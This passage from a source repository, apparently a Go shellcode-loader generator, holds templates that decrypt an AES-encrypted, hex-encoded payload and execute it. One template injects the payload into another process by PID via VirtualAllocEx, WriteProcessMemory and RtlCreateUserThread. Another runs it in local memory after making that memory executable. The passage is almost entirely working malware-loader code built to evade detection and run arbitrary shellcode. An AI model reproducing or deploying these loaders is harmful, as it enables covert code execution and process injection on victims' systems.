hex.DecodeString(decShellcode) 115 | 116 | if err != nil { 117 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 118 | os.Exit(1) 119 | } 120 | 121 | Execute(shellcode) 122 | } -------------------------------------------------------------------------------- /templates/win64_RtlCreateUserThread.tmpl: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "encoding/hex" 8 | "fmt" 9 | "os" 10 | "unsafe" 11 | 12 | "golang.org/x/sys/windows" 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READ = 0x20 19 | PAGE_READWRITE = 0x04 20 | ) 21 | 22 | var ( 23 | kernel32 = windows.NewLazySystemDLL("kernel32.dll") 24 | ntdll = windows.NewLazySystemDLL("ntdll.dll") 25 | 26 | OpenProcess = kernel32.NewProc("OpenProcess") 27 | VirtualAllocEx = kernel32.NewProc("VirtualAllocEx") 28 | VirtualProtectEx = kernel32.NewProc("VirtualProtectEx") 29 | WriteProcessMemory = kernel32.NewProc("WriteProcessMemory") 30 | RtlCreateUserThread = ntdll.NewProc("RtlCreateUserThread") 31 | CloseHandle = kernel32.NewProc("CloseHandle") 32 | ) 33 | 34 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 35 | func Decrypt(key []byte, encryptedText string) string { 36 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 37 | 38 | block, err := aes.NewCipher(key) 39 | if err != nil { 40 | panic(err) 41 | } 42 | 43 | // Using IV 44 | iv := ciphertext[:aes.BlockSize] 45 | 46 | // Checking BlockSize = IV 47 | if len(iv) != aes.BlockSize { 48 | panic("[Error] Ciphertext is too short!") 49 | } 50 | 51 | ciphertext = ciphertext[aes.BlockSize:] 52 | 53 | // Decryption Process 54 | stream := cipher.NewCFBDecrypter(block, iv) 55 | stream.XORKeyStream(ciphertext, ciphertext) 56 | 57 | return string(ciphertext) 58 | } 59 | 60 | func Execute(shellcode []byte, pid int) { 61 | pHandle, _, errOpenProcess := OpenProcess.Call( 62 | windows.PROCESS_CREATE_THREAD|windows.PROCESS_VM_OPERATION|windows.PROCESS_VM_WRITE|windows.PROCESS_VM_READ|windows.PROCESS_QUERY_INFORMATION, 63 | 0, 64 | uintptr(uint32(pid)), 65 | ) 66 | if errOpenProcess != nil && errOpenProcess.Error() != "The operation completed successfully." { 67 | panic("[ERROR] Call to OpenProcess failed!") 68 | } 69 | 70 | addr, _, errVirtualAlloc := VirtualAllocEx.Call( 71 | uintptr(pHandle), 72 | 0, 73 | uintptr(len(shellcode)), 74 | windows.MEM_COMMIT|windows.MEM_RESERVE, 75 | windows.PAGE_READWRITE, 76 | ) 77 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 78 | panic("[ERROR] Call to VirtualAllocEx failed!") 79 | } 80 | _, _, errWriteProcessMemory := WriteProcessMemory.Call( 81 | uintptr(pHandle), 82 | addr, 83 | (uintptr)(unsafe.Pointer(&shellcode[0])), 84 | uintptr(len(shellcode)), 85 | ) 86 | if errWriteProcessMemory != nil && errWriteProcessMemory.Error() != "The operation completed successfully." { 87 | panic("[ERROR] Call to WriteProcessMemory failed!") 88 | } 89 | 90 | oldProtect := windows.PAGE_READWRITE 91 | 92 | _, _, errVirtualProtectEx := VirtualProtectEx.Call( 93 | uintptr(pHandle), 94 | addr, 95 | uintptr(len(shellcode)), 96 | windows.PAGE_EXECUTE_READ, 97 | uintptr(unsafe.Pointer(&oldProtect)), 98 | ) 99 | if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." { 100 | panic("[ERROR] Call to VirtualProtectEx failed!") 101 | } 102 | 103 | var tHandle uintptr 104 | _, _, errRtlCreateUserThread := RtlCreateUserThread.Call( 105 | uintptr(pHandle), 106 | 0, 107 | 0, 108 | 0, 109 | 0, 110 | 0, 111 | addr, 112 | 0, 113 | uintptr(unsafe.Pointer(&tHandle)), 114 | 0, 115 | ) 116 | if errRtlCreateUserThread != nil && errRtlCreateUserThread.Error() != "The operation completed successfully." { 117 | panic("[ERROR] Call to RtlCreateUserThread failed!") 118 | } 119 | 120 | _, _, errCloseHandle := CloseHandle.Call( 121 | uintptr(uint32(pHandle)), 122 | ) 123 | if errCloseHandle != nil && errCloseHandle.Error() != "The operation completed successfully." { 124 | panic("[ERROR] Call to CloseHandle failed!") 125 | } 126 | } 127 | 128 | func main() { 129 | encShellcode := "{{.Shellcode}}" 130 | key := []byte("{{.Key}}") 131 | pid := {{.Pid}} 132 | 133 | // Decrypt base64/AES to original value 134 | decShellcode := Decrypt(key, encShellcode) 135 | 136 | shellcode, err := hex.DecodeString(decShellcode) 137 | 138 | if err != nil { 139 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 140 | os.Exit(1) 141 | } 142 | 143 | Execute(shellcode, pid) 144 | } 145 | -------------------------------------------------------------------------------- /templates/win64_Syscall.tmpl: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "encoding/hex" 8 | "fmt" 9 | "os" 10 | "syscall" 11 | "unsafe" 12 | 13 | "golang.org/x/sys/windows" 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READ = 0x20 20 | PAGE_READWRITE = 0x04 21 | ) 22 | 23 | var ( 24 | kernel32 = windows.NewLazySystemDLL("kernel32.dll") 25 | ntdll = windows.NewLazySystemDLL("ntdll.dll") 26 | 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | VirtualProtect = kernel32.NewProc("VirtualProtect") 29 | RtlCopyMemory = ntdll.NewProc("RtlCopyMemory") 30 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 31 | CreateFiber = kernel32.NewProc("CreateFiber") 32 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 33 | ) 34 | 35 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 36 | func Decrypt(key []byte, encryptedText string) string { 37 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 38 | 39 | block, err := aes.NewCipher(key) 40 | if err != nil { 41 | panic(err) 42 | } 43 | 44 | // Using IV 45 | iv := ciphertext[:aes.BlockSize] 46 | 47 | // Checking BlockSize = IV 48 | if len(iv) != aes.BlockSize { 49 | panic("[Error] Ciphertext is too short!") 50 | } 51 | 52 | ciphertext = ciphertext[aes.BlockSize:] 53 | 54 | // Decryption Process 55 | stream := cipher.NewCFBDecrypter(block, iv) 56 | stream.XORKeyStream(ciphertext, ciphertext) 57 | 58 | return string(ciphertext) 59 | } 60 | 61 | func Execute(shellcode []byte) { 62 | addr, _, errVirtualAlloc := VirtualAlloc.Call( 63 | 0, 64 | uintptr(len(shellcode)), 65 | MEM_COMMIT|MEM_RESERVE, 66 | PAGE_READWRITE, 67 | ) 68 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 69 | panic("[ERROR] Call to VirtualAlloc failed!") 70 | } 71 | 72 | _, _, errRtlCopyMemory := RtlCopyMemory.Call( 73 | addr, 74 | (uintptr)(unsafe.Pointer(&shellcode[0])), 75 | uintptr(len(shellcode)), 76 | ) 77 | if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." { 78 | panic("[ERROR] Call to RtlCopyMemory failed!") 79 | } 80 | 81 | oldProtect := PAGE_READWRITE 82 | _, _, errVirtualProtect := VirtualProtect.Call( 83 | addr, 84 | uintptr(len(shellcode)), 85 | PAGE_EXECUTE_READ, 86 | uintptr(unsafe.Pointer(&oldProtect)), 87 | ) 88 | if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." { 89 | panic("[ERROR] Call to VirtualProtect failed!") 90 | } 91 | _, _, _ = syscall.Syscall( 92 | addr, 93 | 0, 94 | 0, 95 | 0, 96 | 0, 97 | ) 98 | } 99 | 100 | func main() { 101 | encShellcode := "{{.Shellcode}}" 102 | key := []byte("{{.Key}}") 103 | 104 | // Decrypt base64/AES to original value 105 | decShellcode := Decrypt(key, encShellcode) 106 | 107 | shellcode, err := hex.DecodeString(decShellcode) 108 | 109 | if err != nil { 110 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 111 | os.Exit(1) 112 | } 113 | 114 | Execute(shellcode) 115 | } 116 | --------------------------------------------------------------------------------